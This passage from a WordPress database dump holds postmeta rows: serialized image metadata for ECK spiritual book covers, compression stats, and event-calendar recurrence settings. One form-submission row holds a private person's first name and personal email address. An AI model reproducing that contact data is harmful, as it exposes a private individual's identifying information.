11:30:00'),(73616,254576,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:145;s:6:\"height\";i:217;s:4:\"file\";s:34:\"2020/01/the-living-word-book-4.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"the-living-word-book-4-145x150.jpg\";s:5:\"width\";i:145;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:32:\"the-living-word-book-4-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:34:\"the-living-word-book-4-120x180.jpg\";s:5:\"width\";i:120;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:34:\"the-living-word-book-4-145x150.jpg\";s:5:\"width\";i:145;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(73615,254576,'_wp_attached_file','2020/01/the-living-word-book-4.jpg'),(73613,254575,'_wp_attached_file','2020/01/the-flute-of-god.jpg'),(73611,254574,'_wp_attached_file','2020/01/the-call-of-soul.jpg'),(73612,254574,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:140;s:6:\"height\";i:217;s:4:\"file\";s:28:\"2020/01/the-call-of-soul.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"the-call-of-soul-140x150.jpg\";s:5:\"width\";i:140;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:26:\"the-call-of-soul-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:28:\"the-call-of-soul-116x180.jpg\";s:5:\"width\";i:116;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:28:\"the-call-of-soul-140x150.jpg\";s:5:\"width\";i:140;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(73597,254567,'_wp_attached_file','2020/01/hu-most-beautiful-prayer.jpg'),(73598,254567,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:175;s:6:\"height\";i:217;s:4:\"file\";s:36:\"2020/01/hu-most-beautiful-prayer.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"hu-most-beautiful-prayer-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:34:\"hu-most-beautiful-prayer-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:36:\"hu-most-beautiful-prayer-145x180.jpg\";s:5:\"width\";i:145;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:36:\"hu-most-beautiful-prayer-175x150.jpg\";s:5:\"width\";i:175;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(73605,254571,'_wp_attached_file','2020/01/spiritual-experiences-guidebook.jpg'),(73606,254571,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:142;s:6:\"height\";i:217;s:4:\"file\";s:43:\"2020/01/spiritual-experiences-guidebook.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:43:\"spiritual-experiences-guidebook-142x150.jpg\";s:5:\"width\";i:142;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:41:\"spiritual-experiences-guidebook-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:43:\"spiritual-experiences-guidebook-118x180.jpg\";s:5:\"width\";i:118;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:43:\"spiritual-experiences-guidebook-142x150.jpg\";s:5:\"width\";i:142;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(73607,254572,'_wp_attached_file','2020/01/stories-of-past-lives-dreams-and-soul-travel.jpg'),(73608,254572,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:144;s:6:\"height\";i:217;s:4:\"file\";s:56:\"2020/01/stories-of-past-lives-dreams-and-soul-travel.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:56:\"stories-of-past-lives-dreams-and-soul-travel-144x150.jpg\";s:5:\"width\";i:144;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:54:\"stories-of-past-lives-dreams-and-soul-travel-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:56:\"stories-of-past-lives-dreams-and-soul-travel-119x180.jpg\";s:5:\"width\";i:119;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:56:\"stories-of-past-lives-dreams-and-soul-travel-144x150.jpg\";s:5:\"width\";i:144;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(73603,254570,'_wp_attached_file','2020/01/spiritual-exercises-of-eck.jpg'),(73604,254570,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:145;s:6:\"height\";i:217;s:4:\"file\";s:38:\"2020/01/spiritual-exercises-of-eck.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"spiritual-exercises-of-eck-145x150.jpg\";s:5:\"width\";i:145;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:36:\"spiritual-exercises-of-eck-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:38:\"spiritual-exercises-of-eck-120x180.jpg\";s:5:\"width\";i:120;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:38:\"spiritual-exercises-of-eck-145x150.jpg\";s:5:\"width\";i:145;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(73599,254568,'_wp_attached_file','2020/01/past-lives-dreams-and-soul-travel.jpg'),(73600,254568,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:145;s:6:\"height\";i:217;s:4:\"file\";s:45:\"2020/01/past-lives-dreams-and-soul-travel.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"past-lives-dreams-and-soul-travel-145x150.jpg\";s:5:\"width\";i:145;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:43:\"past-lives-dreams-and-soul-travel-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:45:\"past-lives-dreams-and-soul-travel-120x180.jpg\";s:5:\"width\";i:120;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:45:\"past-lives-dreams-and-soul-travel-145x150.jpg\";s:5:\"width\";i:145;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(73601,254569,'_wp_attached_file','2020/01/road-to-spiritual-freedom.jpg'),(73602,254569,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:145;s:6:\"height\";i:217;s:4:\"file\";s:37:\"2020/01/road-to-spiritual-freedom.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"road-to-spiritual-freedom-145x150.jpg\";s:5:\"width\";i:145;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:35:\"road-to-spiritual-freedom-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:37:\"road-to-spiritual-freedom-120x180.jpg\";s:5:\"width\";i:120;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:37:\"road-to-spiritual-freedom-145x150.jpg\";s:5:\"width\";i:145;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(73595,254566,'_wp_attached_file','2020/01/how-to-survive-spiritually.jpg'),(73596,254566,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:148;s:6:\"height\";i:217;s:4:\"file\";s:38:\"2020/01/how-to-survive-spiritually.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"how-to-survive-spiritually-148x150.jpg\";s:5:\"width\";i:148;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:36:\"how-to-survive-spiritually-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:38:\"how-to-survive-spiritually-123x180.jpg\";s:5:\"width\";i:123;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:38:\"how-to-survive-spiritually-148x150.jpg\";s:5:\"width\";i:148;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(73593,254565,'_wp_attached_file','2020/01/how-to-find-god.jpg'),(73594,254565,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:147;s:6:\"height\";i:217;s:4:\"file\";s:27:\"2020/01/how-to-find-god.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"how-to-find-god-147x150.jpg\";s:5:\"width\";i:147;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:25:\"how-to-find-god-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:27:\"how-to-find-god-122x180.jpg\";s:5:\"width\";i:122;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:27:\"how-to-find-god-147x150.jpg\";s:5:\"width\";i:147;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(73584,254560,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:142;s:6:\"height\";i:217;s:4:\"file\";s:39:\"2020/01/book-of-ECK-parables-book-1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"book-of-ECK-parables-book-1-142x150.jpg\";s:5:\"width\";i:142;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:37:\"book-of-ECK-parables-book-1-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:39:\"book-of-ECK-parables-book-1-118x180.jpg\";s:5:\"width\";i:118;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:39:\"book-of-ECK-parables-book-1-142x150.jpg\";s:5:\"width\";i:142;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(73585,254561,'_wp_attached_file','2020/01/book-of-ECK-parables-book-2.jpg'),(73586,254561,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:141;s:6:\"height\";i:217;s:4:\"file\";s:39:\"2020/01/book-of-ECK-parables-book-2.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"book-of-ECK-parables-book-2-141x150.jpg\";s:5:\"width\";i:141;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:37:\"book-of-ECK-parables-book-2-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:39:\"book-of-ECK-parables-book-2-117x180.jpg\";s:5:\"width\";i:117;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:39:\"book-of-ECK-parables-book-2-141x150.jpg\";s:5:\"width\";i:141;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(73580,254558,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:145;s:6:\"height\";i:217;s:4:\"file\";s:33:\"2020/01/ask-the-master-book-1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"ask-the-master-book-1-145x150.jpg\";s:5:\"width\";i:145;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:31:\"ask-the-master-book-1-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:33:\"ask-the-master-book-1-120x180.jpg\";s:5:\"width\";i:120;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:33:\"ask-the-master-book-1-145x150.jpg\";s:5:\"width\";i:145;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(73579,254558,'_wp_attached_file','2020/01/ask-the-master-book-1.jpg'),(73583,254560,'_wp_attached_file','2020/01/book-of-ECK-parables-book-1.jpg'),(73582,254559,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:143;s:6:\"height\";i:217;s:4:\"file\";s:33:\"2020/01/ask-the-master-book-2.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"ask-the-master-book-2-143x150.jpg\";s:5:\"width\";i:143;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:31:\"ask-the-master-book-2-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:33:\"ask-the-master-book-2-119x180.jpg\";s:5:\"width\";i:119;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:33:\"ask-the-master-book-2-143x150.jpg\";s:5:\"width\";i:143;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(73581,254559,'_wp_attached_file','2020/01/ask-the-master-book-2.jpg'),(73575,254556,'_wp_attached_file','2020/01/animals-are-soul-too.jpg'),(73576,254556,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:145;s:6:\"height\";i:217;s:4:\"file\";s:32:\"2020/01/animals-are-soul-too.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"animals-are-soul-too-145x150.jpg\";s:5:\"width\";i:145;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"animals-are-soul-too-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"animals-are-soul-too-120x180.jpg\";s:5:\"width\";i:120;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"animals-are-soul-too-145x150.jpg\";s:5:\"width\";i:145;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(85360,258076,'smush-complete','1'),(85361,258076,'smush-info','The file was compressed from 58.15 KB to 18.35 KB saving 68.44 percent using WP-Optimize'),(85362,258076,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:59541;s:12:\"smushed-size\";i:18792;s:15:\"savings-percent\";d:68.44;}'),(104666,262482,'_field_181','laurahbrockyoung@gmail.com'),(104664,262482,'_field_179','Laurah'),(117455,262896,'_EventOrigin','events-calendar'),(117471,262896,'_EventTimezone','America/Denver'),(117472,262896,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610650800;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1613070000;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1615489200;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1617908400;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1620932400;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1623351600;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1625770800;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1628794800;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1631214000;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1634238000;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(117501,262897,'_EventTimezone','America/Denver'),(117498,262897,'_EventCurrencyPosition','prefix'),(117483,262897,'protect_children',''),(117477,262897,'_EventStartDate','2021-03-11 19:00:00'),(117500,262897,'_EventURL',''),(117478,262897,'_EventStartDateUTC','2021-03-12 02:00:00'),(117479,262897,'_EventEndDate','2021-03-11 20:30:00'),(117499,262897,'_EventCost',''),(117480,262897,'_EventEndDateUTC','2021-03-12 03:30:00'),(117481,262897,'_EventDuration','5400'),(117482,262897,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512642;s:12:\"_EventOrigin\";i:1607512642;s:16:\"protect_children\";i:1607512642;s:13:\"_thumbnail_id\";i:1607512642;s:26:\"_RTECregistrationsDisabled\";i:1607512642;s:17:\"_RTECdeadlineType\";i:1607512642;s:19:\"_RTECwhoCanRegister\";i:1607512642;s:23:\"_RTEClimitRegistrations\";i:1607512642;s:21:\"_RTECmaxRegistrations\";i:1607512642;s:16:\"_EventRecurrence\";i:1607512642;s:17:\"_EventShowMapLink\";i:1607512642;s:13:\"_EventShowMap\";i:1607512642;s:13:\"_EventVenueID\";i:1607512642;s:20:\"_EventCurrencySymbol\";i:1607512642;s:22:\"_EventCurrencyPosition\";i:1607512642;s:10:\"_EventCost\";i:1607512642;s:9:\"_EventURL\";i:1607512642;s:14:\"_EventTimezone\";i:1607512642;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512642;s:16:\"tribe_events_cat\";i:1607537842;}'),(117484,262897,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512642;s:12:\"_EventOrigin\";i:1607512642;s:16:\"protect_children\";i:1607512642;s:13:\"_thumbnail_id\";i:1607512642;s:26:\"_RTECregistrationsDisabled\";i:1607512642;s:17:\"_RTECdeadlineType\";i:1607512642;s:19:\"_RTECwhoCanRegister\";i:1607512642;s:23:\"_RTEClimitRegistrations\";i:1607512642;s:21:\"_RTECmaxRegistrations\";i:1607512642;s:16:\"_EventRecurrence\";i:1607512642;s:17:\"_EventShowMapLink\";i:1607512642;s:13:\"_EventShowMap\";i:1607512642;s:13:\"_EventVenueID\";i:1607512642;s:20:\"_EventCurrencySymbol\";i:1607512642;s:22:\"_EventCurrencyPosition\";i:1607512642;s:10:\"_EventCost\";i:1607512642;s:9:\"_EventURL\";i:1607512642;s:14:\"_EventTimezone\";i:1607512642;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512642;s:16:\"tribe_events_cat\";i:1607537842;}'),(151800,266081,'mec_read_more',''),(117487,262897,'_RTECregistrationsDisabled','1'),(117488,262897,'_RTECdeadlineType','start'),(117489,262897,'_RTECwhoCanRegister','any'),(117490,262897,'_RTEClimitRegistrations','0'),(117491,262897,'_RTECmaxRegistrations','30'),(117485,262897,'_EventOrigin','events-calendar'),(117492,262897,'boldgrid_hide_page_title','0'),(117493,262897,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1